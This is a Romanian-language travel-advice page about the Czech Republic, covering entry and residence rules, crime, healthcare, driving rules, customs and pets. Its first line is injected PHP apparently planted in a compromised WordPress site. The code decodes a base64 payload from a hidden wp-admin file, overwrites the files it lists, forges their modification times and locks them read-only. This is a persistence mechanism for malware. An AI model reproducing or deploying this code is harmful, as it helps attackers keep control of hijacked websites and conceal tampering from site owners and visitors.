$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Republica Ceha – O noua atitudine

Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Cehia.

Intrarea în Republica Cehă este permisă cu paşaportul sau cartea de identitate în curs de valabilitate.

Pentru verificarea condiţiilor particulare de intrare şi şedere prevăzute de legislaţia naţională din Republica Cehă, recomandăm consultarea informaţiilor oficiale furnizate de autorităţile cehe:

Incepând cu data de 1 ianuarie 2011, Ministerul de Interne va prelua răspunderea pentru gestionarea permiselor de lungă şedere.

Cetăţenii străini pot fi angajaţi pe o poziţie care necesită înaltă calificare, numai după ce solicită aşa-numita carte albastră.

Persoanele care intenţionează să desfăşoare o activitate lucrativă in mod independent, ca persoană fizică, cat si cele care vor desfăşura activităţi sub forma participării într-o societate comercială şi care doresc să schimbe scopul şederii, trebuie să se afle pe teritoriul Republicii Cehe de cel puţin 2 ani.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Cehia nu poate fi exclusă din faţa acestei ameninţări.

Cehia nu a suferit atacuri teroriste directe pe teritoriul naţional.

Cetăţenilor români care călătoresc în Cehia li se recomandă să urmărească în permanenţă anunţurile şi recomandările făcute de autorităţile cehe şi să acceseze periodic pagina web a Ministerului român al Afacerilor Externe (www.mae.ro).


Siguranţă şi criminalitate

Cehia este o ţară sigură din punctul de vedere al criminalităţii.

Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

  • Autovehiculele trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraş, este obligatoriu să aveţi, în permanenţă, la dumneavoastră actele de identitate în original (paşaport, permis de şedere).
  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii şi cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia locală precum şi cel mai apropiat oficiu consular român – Secţia Consulară a Ambasadei României la Praga.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor cehe, trebuie apelate următoarele numere de urgenţă:

  • 112 – servicii de urgenţă
  • 158 – poliţie

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!


Sistemul medical

Asigurarea medicală este obligatorie în Cehia.

Încheierea poliţelor de asigurare trebuie făcută în România, neexistând posibilitatea încheierii lor în Cehia.

Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie.

Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare.

Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene.

Mai multe detalii găsiţi la adresele : www.cnas.ro şi www.ceass.ro.

Este bine ca asigurarea medicală suplimentară să fie valabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.

Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.

În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.


Condiţii privind traficul auto

  • Circulaţia auto:

În Cehia, circulaţia auto se efectuează pe partea dreaptă a drumului. Funcţionează sistemul priorităţii de dreapta.
Pe drumurile publice, atât în localităţi cât şi în afara acestora este obligatorie folosirea fazei de întâlnire.

Atenţie
! La intrarea în Republica Cehă este obligatorie cumpărarea rovignetei. Aceasta trebuie să fie aplicată pe parbriz, pentru a fi vizibilă cu uşurinţă, în caz contrar existând riscul de a fi amendat.
Taxele pentru autostrăzi se plătesc sub forma tichetelor de autostradă, care se pot cumpăra de la staţiile de benzină.

  • Starea drumurilor 

Starea generală a drumurilor şi infrastructurii este bună.

  • Centura de siguranţă

Este obligatorie.

  • Parcarea

Parcarea este permisă numai în locuri rezervate, contra cost, iar tichetele trebuie afişate la vedere în interiorul maşinii.

  • Limitele de viteză admise

Depăşirea limitelor de viteză poate atrage aplicarea unor amenzi de până la 500 de euro şi suspendarea permisului de conducere. Amenzile de circulaţie pot fi achitate la Czech State Bank (CNB).

  • în localităţi – 50 km/oră
  • în afara localităţilor – 90 km/oră
  • autostrăzi – 130 km/oră.
  • Aparatele anti-radar şi de detectare a radarului:

Pe teritoriul Republicii Cehe este interzisă utilizarea aparatelor antiradar. Utilizarea lor constituie contravenţie şi se penalizează cu amendă de 2 000 coroane cehe, care reprezintă echivalentul a aproximativ 85 Euro.

  • Permisul de conducere: 

Permisul de conducere românesc este valabil în Cehia.

  • Informaţii pentru cazurile de accident de circulaţie: 

În caz de accident uşor, notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.
Dacă în urma accidentului sunt răniţi, chemaţi poliţia locală, după ce aţi acordat primul ajutor. Adresaţi-vă pentru sprijin partenerului societăţii de asigurări din Cehia.
Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.
Telefoane utile apelabile în caz de urgenţă:

  • 112 – Urgenţă
  • 158 – Poliţia


Utilizarea cărţilor de credit

În Cehia există un sistem bine dezvoltat şi o reţea puternică de ATM-uri.

Se acceptă plata cu cărţi de credit la cvasi-totalitatea magazinelor, restaurantelor, staţiilor de benzină.


Reglementări vamale

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia (ultimele trei nefiind membre ale UE).

Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.

Limitele cantitative pentru introducerea anumitor produse sunt: ţigări: 200 bucăţi, 1 litru băuturi alcoolice, parfum 50 ml sau 250 ml apă de toaletă.

Este interzisă scoaterea din Cehia a obiectelor de artă şi cultură, fără a fi însoţite de un certificat de achiziţie şi un permis de export eliberat de Muzeul Naţional sau de Galeriile de Artă.

Este interzisă introducerea pe teritoriul Cehiei a substanţelor toxice şi psihotrope. Este permis importul şi exportul de valută sau titluri de valoare, fără declaraţie vamală, în limita a 10.000 euro.


Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.

Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!

Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale. Antibioticele precum şi medicamentele pentru răceală şi gripă care conţin pseudoefedrină, nu se eliberează decât pe bază de reţetă.


Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică.

Animalul trebuie identificat printr-un microcip electronic. Până în iulie 2011, se acceptă, de asemenea, şi un tatuaj lizibil.

Sursa: www.mae.ro

By o9admin